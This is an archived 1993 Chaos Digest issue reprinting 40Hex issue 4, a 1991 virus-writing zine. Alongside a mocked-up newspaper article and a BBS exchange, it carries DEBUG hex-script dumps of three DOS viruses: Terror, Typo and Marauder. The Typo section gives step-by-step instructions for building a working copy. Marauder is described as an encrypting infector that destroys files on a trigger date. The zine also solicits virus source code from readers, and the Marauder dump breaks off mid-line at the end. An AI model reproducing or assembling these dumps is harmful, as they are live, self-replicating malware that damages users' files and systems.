HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / pc / KAOS1_42.ZIP / KAOS1-42

Wrap

Text File | 1993-06-02 | 28.4 KB | 637 lines

Chaos Digest Lundi 31 Mai 1993 Volume 1 : Numero 42 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.42 (31 Mai 1993) File 1--40H VMag Issue 1 Volume 4 #004-008 (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Issue 1 Volume 4 #004-008 (reprint) 40Hex Issue 4 December 1991 Terror ++++++ Duh, just as I was about to relase this issue I found that I forgot to make a artical 4. So here it is. --------------------------------------------------------------------------- n terror.com e 0100 50 8C C8 01 06 0B 01 58 EA 00 01 40 00 90 90 90 e 0110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0150 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0160 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0170 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0180 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 01A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 01B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 01C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 01D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 01E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 01F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0200 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0210 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0220 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0230 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0240 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0250 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0260 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0270 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0280 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0290 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 02A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 02B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 02C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 02D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 02E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 02F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0300 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0310 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0320 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0330 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0340 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0350 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0360 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0370 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0380 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0390 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 03A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 03B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 03C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 03D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 03E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 03F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0450 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0460 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0470 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0480 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0490 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 04A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 04B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 04C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 04D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 04E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 04F0 90 90 90 90 90 90 90 90 90 90 90 B8 00 4C CD 21 e 0500 EB 44 E4 12 AB 09 8D 13 D0 17 60 14 7A 0F E9 F8 e 0510 03 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0520 90 90 90 90 90 90 44 3A 5C 43 4F 4D 4D 41 4E 44 e 0530 2E 43 4F 4D 00 2E 81 3E 0E 01 5A 4D 74 07 2E 81 e 0540 3E 0E 01 4D 5A C3 2E 8C 1E 41 05 50 B8 59 EC CD e 0550 21 3B E8 75 3E 0E 1F 58 2E 8E 06 41 05 E8 D5 FF e 0560 74 10 B9 0D 00 BE 0E 01 06 BF 00 01 57 F3 A4 06 e 0570 1F CB 8C C6 83 C6 10 2E 01 36 24 01 2E 03 36 1C e 0580 01 2E 8B 3E 1E 01 06 1F FA 8E D6 8B E7 FB 2E FF e 0590 2E 22 01 B4 30 CD 21 BB 02 01 3D 03 0A 75 12 B8 e 05A0 70 00 BB 43 0D 8E C0 26 80 3F 2E 75 2A 8B C3 EB e 05B0 2A 83 C3 04 3D 03 14 74 1E 83 C3 04 3D 03 1E 74 e 05C0 16 B8 13 35 CD 21 2E 89 1E 27 05 2E 8C 06 29 05 e 05D0 B8 21 35 8B D3 EB 16 2E 8B 47 02 2E 8B 17 2E A3 e 05E0 27 05 2E C7 06 29 05 70 00 B4 34 CD 21 06 1F B8 e 05F0 EC 25 CD 21 2E A1 41 05 8E C0 48 8E D8 8B 1E 03 e 0600 00 83 EB 65 03 C3 26 A3 02 00 B4 4A CD EC BB 64 e 0610 00 B4 48 CD EC 2D 10 00 8E C0 C6 06 00 00 5A 0E e 0620 1F BE 00 01 8B FE B9 43 04 90 F3 A4 BF 32 02 06 e 0630 57 CB 26 C7 06 F1 00 70 00 B8 21 35 CD EC 2E 89 e 0640 1E 87 02 2E 8C 06 89 02 B4 25 BA 63 02 0E 1F CD e 0650 EC 0E 07 BF 43 05 B9 19 00 B0 00 F3 AA E9 F7 FE e 0660 8B E8 CF 3D 59 EC 74 F8 3D 00 4B 74 1E 80 FC 3D e 0670 74 21 80 FC 3E 74 44 80 FC 11 75 0A 57 8B FA 80 e 0680 7D 06 08 74 77 5F EA 5C 06 1E 29 E8 91 00 EB F6 e 0690 59 EB F3 51 E8 27 02 72 F7 83 F9 20 59 75 E7 B0 e 06A0 02 9C 2E FF 1E 87 02 72 0F 50 53 8B D8 2E A0 5C e 06B0 05 2E 88 87 43 05 5B 58 CA 02 00 2E 80 BF 43 05 e 06C0 00 74 C3 50 2E 8A 87 43 05 2E A2 5C 05 2E C6 87 e 06D0 43 05 00 B4 45 CD EC 2E A3 41 05 58 72 A8 9C 2E e 06E0 FF 1E 87 02 72 D2 53 2E 8B 1E 41 05 1E E8 5F 00 e 06F0 E8 92 00 E8 A6 01 1F 5B F8 CA 02 00 50 52 1E 8A e 0700 45 07 BA 26 01 0A C0 74 08 04 40 2E A2 26 01 EB e 0710 03 83 C2 02 0E 1F E8 06 00 1F 5A 58 E9 66 FF 50 e 0720 53 51 E8 99 01 72 24 51 1E E8 23 00 1F B8 01 43 e 0730 33 C9 CD EC 72 07 B8 02 3D CD EC 8B D8 59 72 08 e 0740 E8 42 00 B8 01 43 CD EC E8 51 01 59 5B 58 C3 50 e 0750 52 53 06 B8 13 35 CD EC 2E 89 1E 22 05 2E 8C 06 e 0760 24 05 B0 24 CD EC 2E 89 1E 3D 05 2E 8C 06 3F 05 e 0770 07 5B 0E 1F BA 19 05 B4 25 CD EC BA 1C 05 B0 13 e 0780 CD EC 5A 58 C3 50 51 52 56 57 1E BF 0E 01 B9 FF e 0790 FF BA FA FF B8 02 42 CD EC B4 3F B9 06 00 0E 1F e 07A0 8B D7 CD EC 72 1B 2E 81 3D 54 65 74 14 33 C9 33 e 07B0 D2 B8 00 42 CD EC B4 3F B9 18 00 8B D7 CD EC 73 e 07C0 03 E9 C4 00 33 C9 33 D2 2E 80 3E 5C 05 02 75 0B e 07D0 81 7D 01 00 40 77 EA 49 BA 83 FB B8 02 42 CD EC e 07E0 A9 0F 00 74 0F 8B CA 8B D0 83 C2 10 80 E2 F0 B8 e 07F0 00 42 EB EA E8 3E FD 74 11 0B D2 75 C4 3D 00 04 e 0800 73 03 E9 83 00 3D 00 FA 77 7E B1 04 D3 E8 8B F0 e 0810 B1 0C D3 E2 03 F2 B4 40 BA 00 01 B9 3D 04 90 CD e 0820 EC 72 65 E8 0F FD 75 3C 83 EE 10 2E 2B 75 08 2E e 0830 C7 45 14 00 01 2E 89 75 16 2E C7 45 10 00 04 83 e 0840 C6 44 90 2E 89 75 0E B8 02 42 33 C9 33 D2 CD EC e 0850 B9 00 02 F7 F1 0B D2 74 01 40 2E 89 55 02 2E 89 e 0860 45 04 EB 12 56 57 06 0E 07 BE 2B 05 B9 0B 00 F3 e 0870 A4 07 5F 8F 45 0B B8 00 42 33 C9 33 D2 CD EC B4 e 0880 40 B9 18 00 8B D7 CD EC B8 00 57 CD EC B0 01 CD e 0890 EC B4 3E CD EC 1F 5F 5E 5A 59 58 C3 50 52 1E B8 e 08A0 13 25 2E 8B 16 22 05 2E 8E 1E 24 05 CD EC B0 24 e 08B0 2E 8B 16 3D 05 2E 8E 1E 3F 05 1F 5A 58 C3 50 06 e 08C0 57 53 8B FA 1E 07 B0 00 B9 40 00 F2 AE 8B 45 FD e 08D0 8B 4D FB 25 5F 5F 80 E5 5F 3D 4F 4D 75 09 81 F9 e 08E0 2E 43 74 0E F9 EB 2D 3D 58 45 75 F8 81 F9 2E 45 e 08F0 75 F2 B9 07 00 BB FF FF 43 8A 41 F4 24 5F 2E 3A e 0900 87 29 01 E1 F3 B0 01 75 02 B0 02 2E A2 5C 05 B8 e 0910 00 43 CD EC 5B 5F 07 58 C3 B0 03 CF 80 FC 03 74 e 0920 05 EA C8 0E 1E 29 EA 7A 0F 70 00 50 8C C8 01 06 e 0930 0B 01 58 EA 00 01 20 54 65 72 72 6F 72 1A 1A 1A rcx 083d w q +++++ 40Hex Issue 4 December 1991 "No feelings of what I left behind, no guilt for the victims of my crime. No compassion, just a burning deep inside. No pain... I'm here just to die... " - Sub Zero This artical is from the 11/26/91 morning final of the San Jose Mercury News **text written like this is my comments** SURVEY DEFLATES COMPUTER-VIRUS DANGERS But safeguards are few as cases proliferate. Computer viruses, those nasty bits of distructive programming unleashed by deviant hackers, are multiplying at a startling rate - but haven't proved nearly as troublesome as once feared and aren't scaring users enough to take even simple safeguards. Dataquest Inc. a marker research firm in San Jose released a ground- breaking 150-page survey Monday showing that almost two-thirds of business and government organizatons with more than 300 personal computers has encountered a viurs at least once this year. Yet only 15 percent of them has installed anti-virus software. What's more, Dataquest found the virus encounters more than doubled in each of the first three quarters of 1991. **<smile, smile>** The National Computer Security Association of Washington D.C., which represents 1,000 developers of anti-virus software, hired Dataquest to conduct what is apparently the first study of virus proliferation by a reseacher not directly employed by an anti-virus software company. Computer viruses hide themselves in legitamate files, jumping from machine to machine. Triggered either at random or on a set date, such as Friday the 13th, the most destructive viruses gobble up programs and data in their host computers. **gobble???** Robert Morris, then a student at Cornell University, unleashed a the biggest virus to date in November 1988 **please** when a program he intended to queitly slip onto a network call Internet went out of control and temporally shut down 6,000 computers at universitys and government reaserch labrotorys nationwide. In the wake of the Internet case, there were dire predictions of future virus attacks the could bring the entire economy grinding to a halt. But there haven't been any major virus outbreaks since then and, it turnded out, the Internet virus **Internet worm, damn it!!!** did little permanent damage. What's more, most viruses are relitavely mild - more like a case of sniffles the double pnemonia. Typically, these mild viruses take up space in the computers memory and slow down operations, but don't destroy data. ** :) :( ** "Many viruses are very innocuous," said Shella Cotter, director of software consulting for Dataquest. "You find them, you identify them and you get rid of them." "Many of the viruses I've heard about have not been big problems," added Jay BloomBecker ** tell me he aint gay **, director of the National Center for Computer Crime Data in Santa Cruz. "But it's significant enough that if you're not paying attention to it, you security is probably inadeqaute." Anti-virus software sold over the counter automatcally plucks out the most of the roughly, 1,000 viruses identifey thoughout the world. Occasoinally however, killer viruses can take over an entire computer system and threaten a buisness with massive losses of crucial information. Dataquest talked to 600 orginazations during October and dicovered that 63 percent had encountered at least one virussince the beginning of the year. Of these reporting and encounter, 62 percent claimed "a definite loss of productivity," although the $70,000 study did not tabulate the total cost. In the survey group, 9 percent reported a "virus disaster," defined as a single incedent affecting 25 or more personal computers or diskettes. On average, computers involved in a virus disaster were out of commision four days and required reprogramming at a cost of $6,200. And, in 3 percent of virus attacks, either the person who introduced the virus or the person responible for computer security was threatened with dismmisal. Dataquest didn't count how many were actually fired. "Computer viruses are much more prevalent than people think and, unless we think, and unless we take precautions, over time they are going to get worse," said Andrew Seybold, head of the Dataquest servey team. But anti-virus software and strict enforcement of computer scurity policies could change in the future. "The good news is, it's solveable. The bad news is companies aren't chossing to solve it,", Cotter concluded. ** The other way around for us ** +++++ 40Hex Issue 4 December 1991 The Typo COM Virus The Typo Virus comes in 2 forms - a boot sector infector, and a COM file infector. This version is the COM version. The effective length of the virus is 867 bytes, and it only infects COM files. Typo stays resident, and can infect files whether they are run or not, from my experience. Typo isn't a destructive virus, but it does garble any output to the parallel ports, by exchanging certain letters with others that sound similar, and by transposing numbers. Sometimes it replaces one number with an entirely different number. Typo is believed to have originated in Israel, because some Hebrew letters are changed when it is active, and it was isolated in that country. Typo is easily detected by SCAN, and the scan string is "A1 58 00 2E 89 84 99 FE 26 A1 5A 00" in lines 400 and 410 of the hex dump, below. To assemble TYPO.COM, cut out the following hex, and name the resulting file TYPO. Then, issue the command DEBUG < TYPO and you will have a working version of the virus. --DecimatoR ----------------------------Cut Here------------------------------ n typo.com e 0100 E9 18 00 31 E9 FF FF 2A 2E 43 4F 4D 00 CD 20 20 e 0110 56 31 05 00 CE CD 20 00 59 00 00 53 51 52 1E 06 e 0120 56 0E 1F E8 00 00 5E 83 EE 24 FF 4C 16 83 7C 16 e 0130 03 75 05 C7 44 16 5B 00 E8 85 02 BA D0 00 B4 1A e 0140 CD 21 8A 44 0B 88 44 12 8B 44 0C 89 44 13 B4 2A e 0150 CD 21 F6 C2 01 75 1F 8B D6 81 C2 05 00 33 C9 B4 e 0160 4E CD 21 72 11 E8 2C 00 8B D6 81 C2 05 00 33 C9 e 0170 B4 4F CD 21 73 EF 8A 44 12 A2 00 01 8B 44 13 A3 e 0180 01 01 BA 80 00 B4 1A CD 21 5E 07 1F 5A 59 5B B8 e 0190 00 01 FF E0 B8 01 43 BA EE 00 33 C9 CD 21 B8 02 e 01A0 3D BA EE 00 CD 21 73 03 E9 B4 00 89 44 10 8B D8 e 01B0 B4 3F B9 03 00 8B D6 81 C2 0B 00 CD 21 80 7C 0B e 01C0 E9 75 30 8B 54 0C 83 EA 16 33 C9 B8 00 42 8B 5C e 01D0 10 CD 21 8B D8 B4 3F B9 02 00 8B D6 81 C2 0E 00 e 01E0 8B 5C 10 CD 21 72 65 3D 00 00 74 07 8B 44 0E 3B e 01F0 04 74 59 33 C9 33 D2 B8 02 42 8B 5C 10 CD 21 72 e 0200 4B 2D 03 00 89 44 03 8B 5C 10 B4 40 B9 63 03 90 e 0210 8B D6 81 C2 00 00 CD 21 72 32 83 44 03 19 33 D2 e 0220 33 C9 B8 00 42 8B 5C 10 CD 21 72 20 8B 5C 10 B4 e 0230 40 B9 03 00 8B D6 81 C2 02 00 CD 21 B8 01 57 8B e 0240 5C 10 8B 0E E6 00 8B 16 E8 00 CD 21 8B 5C 10 B4 e 0250 3E CD 21 B8 01 43 BA EE 00 8A 0E E5 00 CD 21 C3 e 0260 FB 80 FC DD 75 03 8A C4 CF 80 FC 00 74 6C EA 2E e 0270 E8 00 F0 C7 84 C7 84 59 00 60 31 32 33 34 35 36 e 0280 37 38 39 30 2D 3D 5C 7E 21 40 23 24 25 5E 26 2A e 0290 28 29 5F 2B 7C 71 77 65 72 74 79 75 69 6F 70 5B e 02A0 5D 5B 61 73 64 66 67 68 6A 6B 6C 3B 27 7A 78 63 e 02B0 76 62 6E 6D 2C 2E 2F 51 57 45 52 54 59 55 49 4F e 02C0 50 7B 7D 41 53 44 46 47 48 4A 4B 4C 3A 22 3B 5A e 02D0 58 43 56 42 4E 4D 3C 3E 3F 2E 56 E8 00 00 5E 9C e 02E0 2E FF 5C 91 53 06 BB 40 00 8E C3 26 8B 1E 6C 00 e 02F0 53 2E 2B 5C 95 83 FB 02 5B 2E 89 5C 95 7F 39 2E e 0300 87 5C 97 2E 2B 5C 97 F7 DB 2E 3B 5C 99 7C 29 2E e 0310 FF 4C 99 2E 83 7C 99 06 74 06 2E C7 44 99 5B 00 e 0320 83 EE 65 51 B9 61 00 2E 3A 04 74 07 46 E2 F8 59 e 0330 EB 06 90 59 2E 8A 44 01 07 5B 5E CA 02 00 80 FC e 0340 00 74 05 80 FC 4C 75 19 E8 24 00 2E 8B 16 2C 00 e 0350 8E C2 BB 00 00 B4 4A CD 21 BA 1D 00 83 C2 01 B4 e 0360 31 EA 60 14 73 02 B8 00 4C EB D3 3F 14 73 02 51 e 0370 57 56 06 E8 00 00 5E 56 BF 00 01 B9 DE 00 2E 8A e 0380 84 EA FE 2E 88 05 46 47 E2 F4 5E 33 C9 8E C1 2E e 0390 8B 4C EC 26 89 0E 84 00 2E 8B 4C EE 26 89 0E 86 e 03A0 00 2E 8B 4C F5 26 89 0E 80 00 2E 8B 4C F7 26 89 e 03B0 0E 82 00 B9 00 01 26 89 0E 58 00 07 5E 5F 59 C3 e 03C0 50 32 C0 B4 DD CD 16 3A C4 75 02 58 C3 53 56 06 e 03D0 8B 54 16 E8 00 00 5E 53 06 BB 40 00 8E C3 26 8B e 03E0 1E 6C 00 2E 89 9C 9D FE 2E 89 9C 9F FE 07 5B 89 e 03F0 94 A1 FE 33 C0 8E C0 26 A1 84 00 2E 89 44 8C 26 e 0400 A1 86 00 2E 89 44 8E 26 A1 58 00 2E 89 84 99 FE e 0410 26 A1 5A 00 2E 89 84 9B FE 26 A1 80 00 2E 89 44 e 0420 95 26 A1 82 00 2E 89 44 97 FA 0E 26 8F 06 86 00 e 0430 26 89 36 84 00 26 81 2E 84 00 98 00 0E 26 8F 06 e 0440 82 00 26 89 36 80 00 26 83 2E 80 00 70 0E 26 8F e 0450 06 5A 00 26 89 36 58 00 26 81 2E 58 00 76 01 FB e 0460 07 5E 5B 58 C3 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A rcx 464 w q --------------------------Cut Here Too----------------------------- Notice to all: 40Hex is always looking for new viruses to do write ups on, and new source code to distribute. If you have a copy of a rare virus, and/or viral source code, please send it to Digital Warfare BBS, at 717-367-3501. We'll be happy to give you the credit for donating it - IF you want us to. ;) --Dec +++++ 40Hex Issue 4 December 1991 How Lame Are These People? ++++++++++++++++++++++++++ This text is from the Homebase BBS, Mcaffee's board, all I can say is read it. Special apperance from Data Distruptor of Rabid and Lestat/Skism, AKA me... Read on... Msg#: 5712 *viru* 11-19-91 17:11:34 From: TERRY ROSS To: ALL Subj: IS THIS A VIRUS? Hi. Is there a known virus which displays a screen which reads "INC, for quality cracks?" I have recently inherited a computer at the company I work at and there was apparently some tetris and blockout games on the disk which are the source of this message. I found a file called "runme.bat" with the text in it, but even after I deleted it, it still pops up the aforementioned message. Also, the message gives me a choice of EGA CGA or monochrome and in general, the message makes life difficult for me. any help with this would be vastly appreciated. <*>Replies <A>gain, <R>eply, <N>ext, or <S>top? Msg has replies, read now(Y/N)? y Msg#: 5715 *viru* 11-19-91 17:50:59 From: ARYEH GORETSKY To: TERRY ROSS Subj: REPLY TO MSG# 5712 (IS THIS A VIRUS?) If you can upload a copy of an infected file, we can see if it contains viral code. Aryeh Goretsky Tech Support <->, <A>gain, <R>eply, <N>ext, or <S>top? N -- The below text was deleted by Aryeh, I don't think he likes me -- Msg#: 5718 *viru* 11-19-91 19:42:34 From: LESTAT /SKISM To: TERRY ROSS Subj: REPLY TO MSG# 5712 (IS THIS A VIRUS?) It's not a virus. INC is the International Network of Crackers. What they do is unprotect games and distribute them. What you do have is most likely illegally obtained software. <->, <D>elete, <A>gain, <R>eply, <N>ext, or <S>top? End of Replies, add yours(Y/N)? N Msg#: 5717 *viru* 11-19-91 18:01:25 From: DATA DISRUPTOR To: ARYEH GORETSKY Subj: REPLY TO MSG# 5597 (RABID) Haha! Funny guy. I believe you are referring to the Roland D-10 and S-10 series of keyboards... R-10 being a keyboard... bah! Data Disruptor RABID Int'nl Development Corp. <*>Replies <->, <A>gain, <R>eply, <N>ext, or <S>top? Msg has replies, read now(Y/N)? y -- Again I was deleted, come on Aryeh old buddy -- Msg#: 5719 *viru* 11-19-91 19:45:03 From: LESTAT /SKISM To: DATA DISRUPTOR Subj: REPLY TO MSG# 5717 (RABID) Thats coming from a guy who thinks INC are virus writers. Jessh. <->, <D>elete, <A>gain, <R>eply, <N>ext, or <S>top? End of Replies, add yours(Y/N)? N +++++ 40Hex Issue 4 December 1991 "I take my boys everywhere I go, cause I'm paranoid..." The Marauder Virus ++++++++++++++++++ December marks the first year of the group Skism. The alliance of Phalcon/Skism took place around July 1991. Me and a few freinds at school started the group by hacking old viruses into new strains. Well I have lost contact with these people since then and a new breed of members has risen from the ashes. Well, I myself have learned a lot over the year. I went from virus hacker with about three viruses to my name, to overwritting man, to what I am now. An advanced (kind of) level assembler programmer, writing parasitic infectors. Well come this time next year I belive I'll be into more major stuff, ya know sick mother fucking DIR-2 type action. I've written a couple of TSR viruses shells, nothing completed yet. Well anyway here's my personal latest creation - Marauder. What Marauder is, is this ---- Marauder Virus By Hellraiser of Phalcon/Skism Aliases: Deadpool-B, 808-B, 860. Marauder is a non-overwriting, non-resident, encrypting, semi-mutating, .COM file infector. When a file is infected with the Marauder Virus the virus will search the current path for a .COM file and infect it, adding 860 bytes to the files size. If not .COM files reside in the current directory, the virus will go up one directory and check for .COM files to infect untill it reaches the root. At the root directory the virus will scan for other directorys to find .COM files, until one uninfected .COM file is found. If no .COM files are found on the disk the virus will terminate it search and return to the currently running program. If an infected file is run on Feburary second of any year, the virus will destroys all files in the current directory, by overwritting them with message code. The files will not run when executed, just terminate upon reading the first line. There is no way to recover the files once the virus destroys them. After this control will be given back to the host program. The Maruder virus is able to infect any .COM file no matter what attribute... Hidden, System, Read-Only, etc... The files date, time, and attribute will not be changed after a file becomes infected. The virus will not cause a system error if run on a write-protected floppy or fixed-disk, merely terminate any attempt of infection. The virus will not infect files under 16 bytes or over 64,675 bytes. For the most part the virus is randomly encrypted with each passing infection, the small part of the program code which is not encrypted mutates between two different, but comaptable strain of bytes. There is not way of detecting the virus infections other than the addition of 860 bytes to infected files, in other words, system-run time is not affected at all. If any run-time is affected it is the split second it takes for the virus to infect a file. The virus causes no damage to disk sectors or boot records etc... The only perminate damage is the destuction of all files in the current directory on 02/02/XX. And here it is... ------------------------------------------------------------------------- n target.com e 0100 E9 61 00 88 68 69 73 20 66 69 6C 65 20 69 73 20 e 0110 69 6E 66 65 63 74 65 64 20 77 69 74 68 20 74 68 e 0120 65 20 4D 61 72 61 75 64 65 72 20 76 69 72 75 73 e 0130 2E 20 31 39 39 32 2C 20 48 65 6C 6C 72 61 69 73 e 0140 65 72 20 50 68 61 6C 63 6F 6E 2F 53 6B 69 73 6D e 0150 2E 0D 0A 24 20 20 20 20 20 20 20 B4 09 BA 03 01 e 0160 CD 21 CD 20 E8 00 00 5E 81 EE 0E 01 E8 05 00 E9 e 0170 85 00 3A 28 8B EE 81 C6 65 04 8B FE 50 53 51 52 e 0180 B9 8F 01 FD AD 33 86 19 01 AB E2 F8 5A 59 5B 58 e 0190 8B F5 C3 E8 DE FF CD 21 E8 D9 FF C3 7A 6B 7B 6A e 01A0 91 B5 13 99 FC 93 D4 51 13 99 EC EE 99 E7 4A 49 e 01B0 4B 48 99 FC 93 D4 77 16 99 EC 42 41 43 40 AB 9D e 01C0 13 EF 48 4B 49 4A 99 E7 DF 32 32 49 5F 73 60 73 e 01D0 67 76 77 60 4F 32 23 2B 2B 20 32 5A 77 7E 7E 60 e 01E0 73 7B 61 77 60 32 3F 32 42 7A 73 7E 71 7D 7C 3D e 01F0 41 79 7B 61 7F 3C 1A 2E 82 0C 0F E5 1B A1 A6 76 e 0200 3E A4 BE 48 3E 2F 82 0C 1F A5 AE 4A 3E E5 1B 7E e 0210 8E 6F 08 FA BB EE EC 2C F7 09 64 9C 23 E5 1B 2C e 0220 7B A0 BE FB 3E 90 00 74 B3 AC EE 2C 6C 75 B7 9E e 0230 75 2C B7 96 69 2C 83 2C 3A D4 C9 8C 6F 76 8E 32 e 0240 B7 BC 55 2C F7 09 8E 02 F7 09 BB D2 38 2A 4F 2B e 0250 D3 96 3B 9C 74 A5 AE 10 3E 91 3D 28 F7 09 49 6C e 0260 8E 32 B7 BC 22 2D F7 09 8E 13 B7 BC 78 2C F7 09 e 0270 48 2A D1 E2 BA 94 67 2C 3B 5C 23 98 3B A0 BE 75 e 0280 3E 9C 74 1B F3 99 29 A5 AE 16 3E E5 1B 5B 33 C1 e 0290 69 29 AA B8 8E 67 D1 DB 8E 13 B7 BC 0C 2D F7 09 e 02A0 48 DA D1 B2 B1 B4 BE 2C B3 B4 71 2C 82 29 79 1B e 02B0 F3 A5 AE A5 3E E5 1B 5A 05 C0 A0 29 48 12 B3 AC e 02C0 76 2C B1 B4 BD 2C B3 B4 7D 2C B1 B4 BF 2C B3 B4 e 02D0 73 2C A9 9C 05 91 3E 28 B7 BC 75 2C F7 09 BA 94 e 02E0 68 2C B2 5D 1F 90 3B 6B B1 A4 71 2C B7 BC B7 2C e 02F0 08 C5 F7 09 8E 16 F7 09 07 2D 3A 5C 30 15 38 28 e 0300 4E 2D 8E 67 D3 7D C5 C1 E1 28 BB 94 75 2C 77 72 e 0310 4E FB D2 1F 3B 15 2A 28 48 E3 07 B7 C6 5B FC 05 e 0320 39 28 B2 8C 63 2C B2 AC 62 2C FC AC 60 2C B2 B8 e 0330 8E C1 B2 8C 6D 2C 08 E8 B2 AC 67 2C C5 AC 7F 2C e 0340 B1 C6 D2 CF 3A 9C 16 E5 1B AB C0 28 4E DF B3 BC e 0350 23 29 8B 20 E9 E2 B3 BC 61 2C BA D2 24 56 39 C3 e 0360 1A B8 B7 9E 79 29 B7 96 21 29 83 38 3A C0 82 28 e 0370 B7 9E 69 29 B7 96 09 29 83 2E 3A C0 90 28 D1 35 e 0380 AA A5 8C 71 3B A5 84 33 3B 91 2A 28 D2 B1 3A A5 e 0390 8C 41 3B A5 84 1B 3B 91 3C 28 D2 A3 3A C0 B6 28 e 03A0 B1 DD 8E 68 83 7F 39 AB FB 